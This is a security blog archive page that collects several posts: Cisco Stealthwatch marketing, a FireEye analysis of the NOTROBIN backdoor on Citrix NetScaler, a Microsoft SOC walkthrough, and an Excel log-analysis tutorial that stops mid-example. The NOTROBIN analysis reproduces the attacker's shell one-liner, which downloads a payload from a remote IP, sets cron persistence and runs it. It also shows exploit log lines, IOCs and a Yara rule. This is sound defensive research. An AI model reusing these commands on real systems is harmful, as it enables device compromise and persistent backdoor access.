Category Archives: Incident Response

Time for Some Straight Talk Around Network Traffic Analysis

According to research from the Enterprise Strategy Group, 87% of organizations use Network Traffic Analysis (NTA) tools for threat detection and response today, and 43% say that NTA is a “first line of defense” in case of an attack. The increasing IT complexity is one of the main factors in the adoption of NTA tools – growing infrastructure, rise in hybrid and multi cloud deployments, employees accessing the network from any device and any location, and large number of smart devices (IoT/OT) connecting to the network. At the same time, the attack landscape has evolved as well – use of stolen credentials, threats hiding in encrypted traffic, rise in nation-state attacks, and more.

Perhaps that’s why there are so many NTA vendors out there today, trying to catch the attention of security practitioners, carrying their “AI and ML” billboards.

Cisco offers an NTA solution as well, but it wasn’t born yesterday. Cisco Stealthwatch has been in the market more than 17 years. And here are some things that make it the market leading NTA solution:

Broad dataset

Stealthwatch has always relied on network meta data such as NetFlow to feed into its analytics. Now, some vendors claim that this way of ingesting telemetry doesn’t give the complete picture and has limitations. It’s because they rely on deploying a large number of sensors and probes in the network to capture data. If I were cynical, I’d say the vendors who take this position want you to buy more probes and increase your workload!

We realized very early on that as the network grows exponentially, it’s very difficult (and expensive) to deploy sensors everywhere. And this approach leaves you with a lot of blind spots. That’s why we offer an agentless deployment to customers using built in functionality in your network devices. And unlike competitive claims, Stealthwatch doesn’t just rely on NetFlow. For example, it gets user contextual data from Cisco Identity Services Engine (ISE) and also ingests proxy, web, and endpoint data to provide comprehensive visibility. If you do need to investigate the payload, Stealthwatch integrates with major packet capture solutions so you can selectively analyze the malicious traffic pinpointed by Stealthwatch.

Layered analytical approach

Visibility is great, but can be dangerous when it begins to overwhelm your security team. The key is effective analytics to reduce that massive dataset to a few actionable alerts. Stealthwatch uses close to 100 different behavioral models to analyze the telemetry and identify anomalies. These anomalies are further reduced to high-level alerts mapped to the kill-chain such as reconnaissance, command-and-control, data exfiltration and others. Stealthwatch also employs machine learning that uses global threat intelligence powered by Cisco Talos and techniques like supervised and unsupervised learning, statistical modeling, rule mining…I could go on. But I want to talk about the outcomes of analytics within the solution:

  • Stealthwatch processes ~6.7 trillion network sessions each day across ~80 million devices in our customer environments and reduces them to a few critical alerts. In fact, our customers consistently rate more than 90% of the alerts they see in the dashboard as helpful.
  • Stealthwatch can automatically detect and classify devices and their roles on the network so that your security scales automatically with your growing network
  • Another key outcome of Stealthwatch security analytics is the ability to analyze encrypted traffic to detect threats and ensure compliance, without any decryption, using Encrypted Traffic Analytics. With greater than 80% of the web traffic being encrypted1 and more than 70% of threats in 2020 predicted to use encryption2, this is a major attack vector and it’s no longer feasible to rely on decryption-based monitoring
  • And lastly, instead of throwing random metrics like “XX times workload reduction”, we asked our customers how Stealthwatch has helped them in their incident response and 77% agreed that it has reduced the time to detect and remediate threats from months to hours.

Multi cloud visibility

As organizations increasingly adopt the cloud, they need to ensure that their security controls extend to the cloud as well. Stealthwatch is the only network traffic analysis solution that can provide truly cloud-native visibility across all major cloud providers like Amazon Web Services (AWS), Microsoft Azure and Google Cloud Platform (GCP). And again, the deployment is agentless without the need to install multiple sensors across the infrastructure. With a single solution, you get visibility across the entire network infrastructure, on-premises to the cloud.

Integrated platform approach

We have been working on integrating Stealthwatch analytics into our security platform that spans the network, endpoint, applications and cloud. Most recently, we have integrated Stealthwatch with Cisco Threat Response. Stealthwatch sends alerts directly to Cisco Threat Response’s Incident Manager feature, allowing users to see those alerts alongside prioritized security alerts from other products such as Firepower devices. These incidents can then be investigated with additional context from your other threat response-enabled technologies, all in one console, with one click. This lowers the time required to triage and response to these alarms.

Stealthwatch is also integrated with firewall through the Cisco Defense Orchestrator for threat detection and effective policy management.

Try Stealthwatch

Customers, big and small, love and trust Stealthwatch. We count 15 of top 20 US banks, and 14 of top 20 global healthcare companies among our customers. If you would like to try the solution, you can sign up for a free 2-week Stealthwatch visibility assessment at: https://www.cisco.com/go/free-visibility-assessment

Joining us at Cisco Live, Barcelona this week? Here’s a guide to all the activities and key sessions related to Stealthwatch at the event or come check out a Stealthwatch demo within the Security area at World of Solutions.

  1. As of May 2019, 94% of all Google web traffic is encrypted. And nearly 80% of web pages loaded by Firefox use HTTPS
  2. Gartner predicts that more than 70% of malware campaigns in 2020 will use some type of encryption to conceal malware delivery, command-and-control activity, or data exfiltration – Gartner, Predicts 2017: Network and Gateway Security, December 13, 2016

The post Time for Some Straight Talk Around Network Traffic Analysis appeared first on Cisco Blogs.

Cloudy with a Chance of Extremely High Alert Accuracy

You can tell it’s raining by sticking your head out the door; but what’s the likelihood of it stopping in the next hour? What’s the temperature and relative humidity? Suddenly the need for analytics is apparent. Without it, the chance of getting soaked on any given day would dramatically increase.

Analytics makes the world go ‘round. So why shouldn’t it be the same in security? According to our CISO Benchmark Study, only 35% of respondents said it was easy to determine the scope of a compromise, contain it, and remediate it. This is where analytics can come in, helping to turn the tide. Analytics are becoming increasingly critical for security, and when done right, can significantly improve an organization’s risk posture.

With so much at stake, cybersecurity should be seamless, precise, and manageable. Unfortunately, as I elaborated on in my last blog post, that’s not often the case. Organizations have become accustomed to purchasing and using too many security products without having enough people to manage them – resulting in more alerts than can be digested.

Forecast: Advanced Analytics   

We understand the importance of delivering security intelligence that can be easily obtained, understood, and responded to in a timely manner. Seventy-seven percent of our customers say that our industry-leading Network Traffic Analysis (NTA) solution, Cisco Stealthwatch, has reduced their time to detect and remediate threats from months to hours, and has provided a fast return on investment.

Stealthwatch provides enterprise-wide visibility from the private network to the public cloud – including from endpoints and encrypted traffic. It delivers comprehensive situational awareness to help organizations detect, prioritize, and mitigate threats in real time.

Customers Enhance Security with Stealthwatch

The in-depth visibility and robust analytics provided by Stealthwatch translate into high-fidelity alerts, dramatically decreasing the need to manually sift through massive amounts of information to pinpoint a security threat. In fact, our customers consistently rate greater than 90 percent of the alerts they receive from Stealthwatch as “helpful,” meaning they lead to something that definitely needs attention. Minimizing noise and zeroing in on what’s most important is a requirement for effectively protecting today’s complex, modernized environments.

  • According to the Durham County Government, Stealthwatch has increased visibility and detection of internal threats by at least 80% and has reduced incident response time by 90%.
  • According to Dimension Data, Stealthwatch has decreased incident response time by over 100 days.
  • And with Stealthwatch, J. Crew Group can now respond to incidents in 10-15 minutes.

A Platform Approach to Security

Stealthwatch is part of a portfolio of products that work together as a team, learning from each other and improving each other’s effectiveness. For example, Stealthwatch integrates with our incident response portal, Cisco Threat Response, and our security policy management tool, Cisco Defense Orchestrator. We also integrate third-party solutions to deliver more thorough and impactful defenses.

Stealthwatch leverages many aspects of our platform approach to security – including integration, automation, and machine learning – to harden networks and simplify protection. It’s like knowing with confidence what the weather will be like all day and having exactly the right kind of clothes to stay comfortable and dry.

Learn More

If you are joining us this week at Cisco Live in Barcelona, come check out Stealthwatch at one of the sessions or experience a demo within the Security area at the World of Solutions. Or, learn more about Stealthwatch here and take our free 2-week visibility assessment to see how powerful security analytics can quickly surface threats that might be lurking within your network.

The post Cloudy with a Chance of Extremely High Alert Accuracy appeared first on Cisco Blogs.

404 Exploit Not Found: Vigilante Deploying Mitigation for Citrix NetScaler Vulnerability While Maintaining Backdoor

As noted in Rough Patch: I Promise It'll Be 200 OK, our FireEye Mandiant Incident Response team has been hard at work responding to intrusions stemming from the exploitation of CVE-2019-19781. After analyzing dozens of successful exploitation attempts against Citrix ADCs that did not have the Citrix mitigation steps implemented, we’ve recognized multiple groups of post-exploitation activity. Within these, something caught our eye: one particular threat actor that’s been deploying a previously-unseen payload for which we’ve created the code family NOTROBIN.

Upon gaining access to a vulnerable NetScaler device, this actor cleans up known malware and deploys NOTROBIN to block subsequent exploitation attempts! But all is not as it seems, as NOTROBIN maintains backdoor access for those who know a secret passphrase. FireEye believes that this actor may be quietly collecting access to NetScaler devices for a subsequent campaign.

Initial Compromise

This actor exploits NetScaler devices using CVE-2019-19781 to execute shell commands on the compromised device. They issue an HTTP POST request from a Tor exit node to transmit the payload to the vulnerable newbm.pl CGI script. For example, Figure 1 shows a web server access log entry recording exploitation:

127.0.0.2 - - [12/Jan/2020:21:55:19 -0500] "POST
/vpn/../vpns/portal/scripts/newbm.pl HTTP/1.1" 304 - "-" "curl/7.67.0"

Figure 1: Web log showing exploitation

Unlike other actors, this actor appears to exploit devices using a single HTTP POST request that results in an HTTP 304 response—there is no observed HTTP GET to invoke staged commands. Unfortunately, we haven’t recovered the POST body contents to see how it works.  In any case, exploitation causes the Bash one liner shown in Figure 2 to run on the compromised system:

pkill -9 netscalerd; rm /var/tmp/netscalerd; mkdir /tmp/.init; curl -k
hxxps://95.179.163[.]186/wp-content/uploads/2018/09/64d4c2d3ee56af4f4ca8171556d50faa -o
/tmp/.init/httpd; chmod 744 /tmp/.init/httpd; echo "* * * * *
/var/nstmp/.nscache/httpd" | crontab -; /tmp/.init/httpd &"

Figure 2: Bash exploit payload

This is the same methodology as described in Rough Patch: I Promise It'll Be 200 OK. The effects of this series of commands includes:

  1. Kill and delete all running instances of netscalerd—a common process name used for cryptocurrency mining utilities deployed to NetScaler devices.
  2. Creates a hidden staging directory /tmp/.init, download NOTROBIN to it, and enable the execute permission.
  3. Install /var/nstmp/.nscache/httpd for persistence via the cron daemon. This is the path to which NOTROBIN will copy itself.
  4. Manually execute NOTROBIN.

There’s a lot to unpack here. Of note, the actor removes malware known to target NetScaler devices via the CVE-2019-19781 vulnerability. Cryptocurrency miners are generally easy to identify—just look for the process utilizing nearly 100% of the CPU. By uninstalling these unwanted utilities, the actor may hope that administrators overlook an obvious compromise of their NetScaler devices.

The actor uses curl to fetch NOTROBIN from the hosting server with IP address 95.179.163[.]186 that appears to be an abandoned WordPress site. FireEye has identified many payloads hosted on this server, each named after their embedded authentication key. Interestingly, we haven’t seen reuse of the same payload across multiple clients. Compartmenting payloads indicates the actor is exercising operational security.

FireEye has recovered cron syslog entries, such as those shown in Figure 3, that confirm the persistent installation of NOTROBIN. Note that these entries appear just after the initial compromise. This is a robust indicator of compromise to triage NetScaler devices.

Jan 12 21:57:00 <cron.info> foo.netscaler /usr/sbin/cron[73531]:
(nobody) CMD (/var/nstmp/.nscache/httpd)

Figure 3: cron log entry showing NOTROBIN execution

Now, let’s turn our attention to what NOTROBIN does.

Analysis of NOTROBIN

NOTROBIN is a utility written in Go 1.10 and compiled to a 64-bit ELF binary for BSD systems. It periodically scans for and deletes files matching filename patterns and content characteristics. The purpose seems to be to block exploitation attempts against the CVE-2019-19781 vulnerability; however, FireEye believes that NOTROBIN provides backdoor access to the compromised system.

When executed, NOTROBIN ensures that it is running from the path /var/nstmp/.nscache/httpd. If not, the utility copies itself to this path, spawns the new copy, and then exits itself. This provides detection cover by migrating the process from /tmp/, a suspicious place for long-running processes to execute, to an apparently NetScaler-related, hidden directory.

Now the fun begins: it spawns two routines that periodically check for and delete exploits.

Every second, NOTROBIN searches the directory /netscaler/portal/scripts/ for entries created within the last 14 days and deletes them, unless the filename or file content contains a hardcoded key (example: 64d4c2d3ee56af4f4ca8171556d50faa). Open source reporting indicates that some actors write scripts into this directory after exploiting CVE-2019-19781. Therefore, we believe that this routine cleans the system of publicly known payloads, such as PersonalBookmark.pl.

Eight times per second, NOTROBIN searches for files with an .xml extension in the directory /netscaler/portal/templates/. This is the directory into which exploits for CVE-2019-19781 write templates containing attacker commands. NOTROBIN deletes files that contain either of the strings block or BLOCK, which likely match potential exploit code, such as that found in the ProjectZeroIndia exploit; however, the utility does not delete files with a filename containing the secret key.

FireEye believes that actors deploy NOTROBIN to block exploitation of the CVE-2019-19781 vulnerability while maintaining backdoor access to compromised NetScaler devices. The mitigation works by deleting staged exploit code found within NetScaler templates before it can be invoked. However, when the actor provides the hardcoded key during subsequent exploitation, NOTROBIN does not remove the payload. This lets the actor regain access to the vulnerable device at a later time.

Across multiple investigations, FireEye observed actors deploying NOTROBIN with unique keys. For example, we’ve recovered nearly 100 keys from different binaries. These look like MD5 hashes, though FireEye has been unsuccessful in recovering any plaintext. Using complex, unique keys makes it difficult for third parties, such as competing attackers or FireEye, to easily scan for NetScaler devices “protected” by NOTROBIN. This actor follows a strong password policy!

Based on strings found within NOTROBIN, the actor appears to inject the key into the Go project using source code files named after the key. Figure 4 and Figure 5 show examples of these filenames.

/tmp/b/.tmpl_ci/64d4c2d3ee56af4f4ca8171556d50faa.go

Figure 4: Source filename recovered from NOTROBIN sample

/root/backup/sources/d474a8de77902851f96a3b7aa2dcbb8e.go

Figure 5: Source filename recovered from NOTROBIN sample

We wonder if “tmpl_ci” refers to a Continuous Integration setup that applies source code templating to inject keys and build NOTROBIN variants. We also hope the actor didn’t have to revert to backups after losing the original source!

Outstanding Questions

NOTROBIN spawns a background routine that listens on UDP port 18634 and receives data; however, it drops the data without inspecting it. You can see this logic in Figure 6. FireEye has not uncovered a purpose for this behavior, though DCSO makes a strong case for this being used as a mutex, as only a single listener can be active on this port.


Figure 6: NOTROBIN logic that drops UDP traffic

There is also an empty function main.install_cron whose implementation has been removed, so alternatively, perhaps these are vestiges of an early version of NOTROBIN. In any case, a NetScaler device listening on UDP port 18634 is a reliable indicator of compromise. Figure 7 shows an example of listing the open file handles on a compromised NetScaler device, including a port listening on UDP 18634.


Figure 7: File handling listing of compromised NetScaler device

NOTROBIN Efficacy

During one engagement, FireEye reviewed forensic evidence of NetScaler exploitation attempts against a single device, both before and after NOTROBIN was deployed by an actor. Prior to January 12, before NOTROBIN was installed, we identified successful attacks from multiple actors. But, across the following three days, more than a dozen exploitation attempts were thwarted by NOTROBIN. In other words, NOTROBIN inoculated the vulnerable device from further compromise. For example, Figure 8 shows a log message that records a failed exploitation attempt.

127.0.0.2 - - [13/Jan/2020:05:09:07 -0500] "GET
/vpn/../vpns/portal/wTyaINaDVPaw8rmh.xml HTTP/1.1" 404 48 "-"
"curl/7.47.0"

Figure 8: Web log entry showing a failed exploitation attempt

Note that the application server responded with HTTP 404 (“Not Found”) as this actor attempts to invoke their payload staged in the template wTyaINaDVPaw8rmh.xml. NOTROBIN deleted the malicious template shortly after it was created – and before it could be used by the other actor.

FireEye has not yet identified if the actor has returned to NOTROBIN backdoors.

Conclusion

FireEye believes that the actor behind NOTROBIN has been opportunistically compromising NetScaler devices, possibly to prepare for an upcoming campaign. They remove other known malware, potentially to avoid detection by administrators that check into their devices after reading Citrix security bulletin CTX267027. NOTROBIN mitigates CVE-2019-19781 on compromised devices but retains a backdoor for an actor with a secret key. While we haven’t seen the actor return, we’re skeptical that they will remain a Robin Hood character protecting the internet from the shadows.

Indicators of Compromise and Discovery

Table 1 lists indicators that match NOTROBIN variants that FireEye has identified. The domain vilarunners[.]cat is the WordPress site that hosted NOTROBIN payloads. The domain resolved to 95.179.163[.]186 during the time of observed activity. As of January 15, the vilarunners[.]cat domain currently resolves to a new IP address of 80.240.31[.]218.

IOC Item

Value

HTTP URL prefix

hxxps://95[.]179.163.186/wp-content/uploads/2018/09/

Directory

/var/nstmp/.nscache

Filename

/var/nstmp/.nscache/httpd

Directory

/tmp/.init

Filename

/tmp/.init/httpd

Crontab entry

/var/nstmp/.nscache/httpd

Listening UDP port

18634

Remote IP

95.179.163[.]186

Remote IP

80.240.31[.]218

Domain

vilarunners[.]cat

Table 1: Indicators of Compromise

Discovery on VirusTotal

You can use the following VTI queries to identify NOTROBIN variants on VirusTotal:

  • vhash:"73cee1e8e1c3265c8f836516c53ae042"
  • vhash:"e57a7713cdf89a2f72c6526549d22987"

Note, the vHash implementation is private, so we’re not able to confirm why this technique works. In practice, the vHashes cover the same variants identified by the Yara rule listed in Figure 9.

rule NOTROBIN

{

    meta:

        author = "william.ballenthin@fireeye.com"

        date_created = "2020-01-15"

    strings:

        $func_name_1 = "main.remove_bds"

        $func_name_2 = "main.xrun"

    condition:

        all of them

}

Figure 9: Yara rule that matches on NOTROBIN variants

Recovered Authentication Keys

FireEye has identified nearly 100 hardcoded keys from NOTROBIN variants that the actor could use to re-enter compromised environments. We expect that these strings may be found within subsequent exploitation attempts, either as filenames or payload content. Although we won’t publish them here out of concern for our customers, please reach out if you’re looking for NOTROBIN within your environment and we can provide a list.

Acknowledgements

Thank you to analysts across FireEye that are currently responding to this activity, including Brandan Schondorfer for collecting and interpreting artifacts, Steven Miller for coordinating analysis, Evan Reese for pivoting across intel leads, Chris Glyer for reviewing technical aspects, Moritz Raabe for reverse engineering NOTROBIN samples, and Ashley Frazer for refining the presentation and conclusions.

CISO series: Lessons learned from the Microsoft SOC—Part 3b: A day in the life

The Lessons learned from the Microsoft SOC blog series is designed to share our approach and experience with security operations center (SOC) operations. We share strategies and learnings from our SOC, which protects Microsoft, and our Detection and Response Team (DART), who helps our customers address security incidents. For a visual depiction of our SOC philosophy, download our Minutes Matter poster.

For the next two installments in the series, we’ll take you on a virtual shadow session of a SOC analyst, so you can see how we use security technology. You’ll get to virtually experience a day in the life of these professionals and see how Microsoft security tools support the processes and metrics we discussed earlier. We’ll primarily focus on the experience of the Investigation team (Tier 2) as the Triage team (Tier 1) is a streamlined subset of this process. Threat hunting will be covered separately.

Image of security workers in an office.

General impressions

Newcomers to the facility often remark on how calm and quiet our SOC physical space is. It looks and sounds like a “normal” office with people going about their job in a calm professional manner. This is in sharp contrast to the dramatic moments in TV shows that use operations centers to build tension/drama in a noisy space.

Nature doesn’t have edges

We have learned that the real world is often “messy” and unpredictable, and the SOC tends to reflect that reality. What comes into the SOC doesn’t always fit into the nice neat boxes, but a lot of it follows predictable patterns that have been forged into standard processes, automation, and (in many cases) features of Microsoft tooling.

Routine front door incidents

The most common attack patterns we see are phishing and stolen credentials attacks (or minor variations on them):

  • Phishing email → Host infection → Identity pivot:

Infographic indicating: Phishing email, Host infection, and Identity pivot

  • Stolen credentials → Identity pivot → Host infection:

Infographic indicating: Stolen credentials, Identity pivot, and Host infection

While these aren’t the only ways attackers gain access to organizations, they’re the most prevalent methods mastered by most attackers. Just as martial artists start by mastering basic common blocks, punches, and kicks, SOC analysts and teams must build a strong foundation by learning to respond rapidly to these common attack methods.

As we mentioned earlier in the series, it’s been over two years since network-based detection has been the primary method for detecting an attack. We attribute this primarily to investments that improved our ability to rapidly remediate attacks early with host/email/identity detections. There are also fundamental challenges with network-based detections (they are noisy and have limited native context for filtering true vs. false positives).

Analyst investigation process

Once an analyst settles into the analyst pod on the watch floor for their shift, they start checking the queue of our case management system for incidents (not entirely unlike phone support or help desk analysts would).

While anything might show up in the queue, the process for investigating common front door incidents includes:

  1. Alert appears in the queue—After a threat detection tool detects a likely attack, an incident is automatically created in our case management system. The Mean Time to Acknowledge (MTTA) measurement of SOC responsiveness begins with this timestamp. See Part 1: Organization for more information on key SOC metrics.

Basic threat hunting helps keep a queue clean and tidy

Require a 90 percent true positive rate for alert sources (e.g., detection tools and types) before allowing them to generate incidents in the analyst queue. This quality requirement reduces the volume of false positive alerts, which can lead to frustration and wasted time. To implement, you’ll need to measure and refine the quality of alert sources and create a basic threat hunting process. A basic threat hunting process leverages experienced analysts to comb through alert sources that don’t meet this quality bar to identify interesting alerts that are worth investigating. This review (without requiring full investigation of each one) helps ensure that real incident detections are not lost in the high volume of noisy alerts. It can be a simple part time process, but it does require skilled analysts that can apply their experience to the task.

  1. Own and orient—The analyst on shift begins by taking ownership of the case and reading through the information available in the case management tool. The timestamp for this is the end of the MTTA responsiveness measurement and begins the Mean Time to Remediate (MTTR) measurement.

Experience matters

A SOC is dependent on the knowledge, skills, and expertise of the analysts on the team. The attack operators and malware authors you defend against are often adaptable and skilled humans, so no prescriptive textbook or playbook on response will stay current for very long. We work hard to take good care of our people—giving them time to decompress and learn, recruiting them from diverse backgrounds that can bring fresh perspectives, and creating a career path and shadowing programs that encourage them to learn and grow.

  1. Check out the host—Typically, the first priority is to identify affected endpoints so analysts can rapidly get deep insight. Our SOC relies on the Endpoint Detection and Response (EDR) functionality in Microsoft Defender Advanced Threat Protection (ATP) for this.

Why endpoint is important

Our analysts have a strong preference to start with the endpoint because:

  • Endpoints are involved in most attacks—Malware on an endpoint represents the sole delivery vehicle of most commodity attacks, and most attack operators still rely on malware on at least one endpoint to achieve their objective. We’ve also found the EDR capabilities detect advanced attackers that are “living off the land” (using tools deployed by the enterprise to navigate). The EDR functionality in Microsoft Defender ATP provides visibility into normal behavior that helps detect unusual command lines and process creation events.
  • Endpoint offers powerful insights—Malware and its behavior (whether automated or manual actions) on the endpoint often provides rich detailed insight into the attacker’s identity, skills, capabilities, and intentions, so it’s a key element that our analysts always check for.

Identifying the endpoints affected by this incident is easy for alerts raised by the Microsoft Defender ATP EDR, but may take a few pivots on an email or identity sourced alert, which makes integration between these tools crucial.

  1. Scope out and fill in the timeline—The analyst then builds a full picture and timeline of the related chain of events that led to the alert (which may be an adversary’s attack operation or false alarm positive) by following leads from the first host alert. The analyst travels along the timeline:
  • Backward in time—Track backward to identify the entry point in the environment.
  • Forward in time—Follow leads to any devices/assets an attacker may have accessed (or attempted to access).

Our analysts typically build this picture using the MITRE ATT&CK™ model (though some also adhere to the classic Lockheed Martin Cyber Kill Chain®).

True or false? Art or science?

The process of investigation is partly a science and partly an art. The analyst is ultimately building a storyline of what happened to determine whether this chain of events is the result of a malicious actor (often attempting to mask their actions/nature), a normal business/technical process, an innocent mistake, or something else.

This investigation is a repetitive process. Analysts identify potential leads based on the information in the original report, follow those leads, and evaluate if the results contribute to the investigation.

Analysts often contact users to identify whether they performed an anomalous action intentionally, accidentally, or was not done by them at all.

Running down the leads with automation

Much like analyzing physical evidence in a criminal investigation, cybersecurity investigations involve iteratively digging through potential evidence, which can be tedious work. Another parallel between cybersecurity and traditional forensic investigations is that popular TV and movie depictions are often much more exciting and faster than the real world.

One significant advantage of investigating cyberattacks is that the relevant data is already electronic, making it easier to automate investigation. For many incidents, our SOC takes advantage of security orchestration, automation, and remediation (SOAR) technology to automate investigation (and remediation) of routine incidents. Our SOC relies heavily on the AutoIR functionality in Microsoft Threat Protection tools like Microsoft Defender ATP and Office 365 ATP to reduce analyst workload. In our current configuration, some remediations are fully automatic and some are semi-automatic (where analysts review the automated investigations and propose remediation before approving execution of it).

Document, document, document

As the analyst builds this understanding, they must capture a complete record with their conclusions and reasoning/evidence for future use (case reviews, analyst self-education, re-opening cases that are later linked to active attacks, etc.).

As our analyst develops information on an incident, they capture the common, most relevant details quickly into the case such as:

  • Alert info: Alert links and Alert timeline
  • Machine info: Name and ID
  • User info
  • Event info
  • Detection source
  • Download source
  • File creation info
  • Process creation
  • Installation/Persistence method(s)
  • Network communication
  • Dropped files

Fusion and integration avoid wasting analyst time

Each minute an analyst wastes on manual effort is another minute the attacker has to spread, infect, and do damage during an attack operation. Repetitive manual activity also creates analyst toil, increases frustration, and can drive interest in finding a new job or career.

We learned that several technologies are key to reducing toil (in addition to automation):

  • Fusion—Adversary attack operations frequently trip multiple alerts in multiple tools, and these must be correlated and linked to avoid duplication of effort. Our SOC has found significant value from technologies that automatically find and fuse these alerts together into a single incident. Azure Security Center and Microsoft Threat Protection include these natively.
  • Integration—Few things are more frustrating and time consuming than having to switch consoles and tools to follow a lead (a.k.a., swivel chair analytics). Switching consoles interrupts their thought process and often requires manual tasks to copy/paste information between tools to continue their work. Our analysts are extremely appreciative of the work our engineering teams have done to bring threat intelligence natively into Microsoft’s threat detection tools and link together the consoles for Microsoft Defender ATP, Office 365 ATP, and Azure ATP. They’re also looking forward to (and starting to test) the Microsoft Threat Protection Console and Azure Sentinel updates that will continue to reduce the swivel chair analytics.

Stay tuned for the next segment in the series, where we’ll conclude our investigation, remediate the incident, and take part in some continuous improvement activities.

Learn more

In the meantime, bookmark the Security blog to keep up with our expert coverage on security matters and follow us at @MSFTSecurity for the latest news and updates on cybersecurity.

To learn more about SOCs, read previous posts in the Lessons learned from the Microsoft SOC series, including:

Watch the CISO Spotlight Series: Passwordless: What’s It Worth.

Also, see our full CISO series and download our Minutes Matter poster for a visual depiction of our SOC philosophy.

The post CISO series: Lessons learned from the Microsoft SOC—Part 3b: A day in the life appeared first on Microsoft Security.

Norsk Hydro responds to ransomware attack with transparency

Last March, aluminum supplier Norsk Hydro was attacked by LockerGoga, a form of ransomware. The attack began with an infected email and locked the files on thousands of servers and PCs. All 35,000 Norsk Hydro employees across 40 countries were affected. In the throes of this crisis, executives made three swift decisions:

  • Pay no ransom.
  • Summon Microsoft’s cybersecurity team to help restore operations.
  • Communicate openly about the breach.

Read Hackers hit Norsk Hydro with ransomware to learn why this approach helped the company recover and get back to business as usual.

The post Norsk Hydro responds to ransomware attack with transparency appeared first on Microsoft Security.

Excelerating Analysis – Tips and Tricks to Analyze Data with Microsoft Excel

Incident response investigations don’t always involve standard host-based artifacts with fully developed parsing and analysis tools. At FireEye Mandiant, we frequently encounter incidents that involve a number of systems and solutions that utilize custom logging or artifact data. Determining what happened in an incident involves taking a dive into whatever type of data we are presented with, learning about it, and developing an efficient way to analyze the important evidence.

One of the most effective tools to perform this type of analysis is one that is in almost everyone’s toolkit: Microsoft Excel. In this article we will detail some tips and tricks with Excel to perform analysis when presented with any type of data.

Summarizing Verbose Artifacts

Tools such as FireEye Redline include handy timeline features to combine multiple artifact types into one concise timeline. When we use individual parsers or custom artifact formats, it may be tricky to view multiple types of data in the same view. Normalizing artifact data with Excel to a specific set of easy-to-use columns makes for a smooth combination of different artifact types.

Consider trying to review parsed file system, event log, and Registry data in the same view using the following data.

$SI Created

$SI Modified

File Name

File Path

File Size

File MD5

File Attributes

File Deleted

2019-10-14 23:13:04

2019-10-14 23:33:45

Default.rdp

C:\Users\
attacker\Documents\

485

c482e563df19a40
1941c99888ac2f525

Archive

FALSE

Event Gen Time

Event ID

Event Message

Event Category

Event User

Event System

2019-10-14 23:13:06

4648

A logon was attempted using explicit credentials.

Subject:
   Security ID:  DomainCorp\Administrator
   Account Name:  Administrator
   Account Domain:  DomainCorp
   Logon ID:  0x1b38fe
   Logon GUID:  {00000000-0000-0000-0000-000000000000}
Account Whose Credentials Were Used:
   Account Name:  VictimUser
   Account Domain:  DomainCorp
   Logon GUID:  {00000000-0000-0000-0000-000000000000}
Target Server:
   Target Server Name: DestinationServer
   Additional Information:
Process Information:
   Process ID:  0x5ac
   Process Name:  C:\Program Files\Internet Explorer\iexplore.exe
Network Information:
   Network Address: -
   Port:   -

Logon

Administrator

SourceSystem

KeyModified

Key Path

KeyName

ValueName

ValueText

Type

2019-10-14 23:33:46

HKEY_USER\Software\Microsoft\Terminal Server Client\Servers\

DestinationServer

UsernameHInt

VictimUser

REG_SZ

Since these raw artifact data sets have different column headings and data types, they would be difficult to review in one timeline. If we format the data using Excel string concatenation, we can make the data easy to combine into a single timeline view. To format the data, we can use the “&” operation with a function to join information we may need into a “Summary” field.

An example command to join the relevant file system data delimited by ampersands could be “=D2 & " | " & C2 & " | " & E2 & " | " & F2 & " | " & G2 & " | " & H2”. Combining this format function with a “Timestamp” and “Timestamp Type” column will complete everything we need for streamlined analysis.

Timestamp

Timestamp Type

Event

2019-10-14 23:13:04

$SI Created

C:\Users\attacker\Documents\ | Default.rdp | 485 | c482e563df19a401941c99888ac2f525  | Archive | FALSE

2019-10-14 23:13:06

Event Gen Time

4648 | A logon was attempted using explicit credentials.

Subject:
   Security ID:  DomainCorp\Administrator
   Account Name:  Administrator
   Account Domain:  DomainCorp
   Logon ID:  0x1b38fe
   Logon GUID:  {00000000-0000-0000-0000-000000000000}
Account Whose Credentials Were Used:
   Account Name:  VictimUser
   Account Domain:  DomainCorp
   Logon GUID:  {00000000-0000-0000-0000-000000000000}
Target Server:
   Target Server Name: DestinationServer
   Additional Information:
Process Information:
   Process ID:  0x5ac
   Process Name:  C:\Program Files\Internet Explorer\iexplore.exe
Network Information:
   Network Address: -
   Port:   - | Logon | Administrator | SourceSystem

2019-10-14 23:33:45

$SI Modified

C:\Users\attacker\Documents\ | Default.rdp | 485 | c482e563df19a401941c99888ac2f525  | Archive | FALSE

2019-10-14 23:33:46

KeyModified

HKEY_USER\Software\Microsoft\Terminal Server Client\Servers\ | DestinationServer | UsernameHInt | VictimUser

After sorting by timestamp, we can see evidence of the “DomainCorp\Administrator” account connecting from “SourceSystem” to “DestinationServer” with the “DomainCorp\VictimUser” account via RDP across three artifact types.

Time Zone Conversions

One of the most critical elements of incident response and forensic analysis is timelining. Temporal analysis will often turn up new evidence by identifying events that precede or follow an event of interest. Equally critical is producing an accurate timeline for reporting. Timestamps and time zones can be frustrating, and things can get confusing when the systems being analyzed span various time zones. Mandiant tracks all timestamps in Coordinated Universal Time (UTC) format in its investigations to eliminate any confusion of both time zones and time adjustments such as daylight savings and regional summer seasons. 

Of course, various sources of evidence do not always log time the same way. Some may be local time, some may be UTC, and as mentioned, data from sources in various geographical locations complicates things further. When compiling timelines, it is important to first know whether the evidence source is logged in UTC or local time. If it is logged in local time, we need to confirm which local time zone the evidence source is from. Then we can use the Excel TIME()  formula to convert timestamps to UTC as needed.

This example scenario is based on a real investigation where the target organization was compromised via phishing email, and employee direct deposit information was changed via an internal HR application. In this situation, we have three log sources: email receipt logs, application logins, and application web logs. 

The email logs are recorded in UTC and contain the following information:

The application logins are recorded in Eastern Daylight Time (EDT) and contain the following:

The application web logs are also recorded in Eastern Daylight Time (EDT) and contain the following:

To take this information and turn it into a master timeline, we can use the CONCAT function (an alternative to the ampersand concatenation used previously) to make a summary of the columns in one cell for each log source, such as this example formula for the email receipt logs:

This is where checking our time zones for each data source is critical. If we took the information as it is presented in the logs and assumed the timestamps were all in the same time zone and created a timeline of this information, it would look like this:

As it stands the previous screenshot, we have some login events to the HR application, which may look like normal activity for the employees. Then later in the day, they receive some suspicious emails. If this were hundreds of lines of log events, we would risk the login and web log events being overlooked as the time of activity precedes our suspected initial compromise vector by a few hours. If this were a timeline used for reporting, it would also be inaccurate.

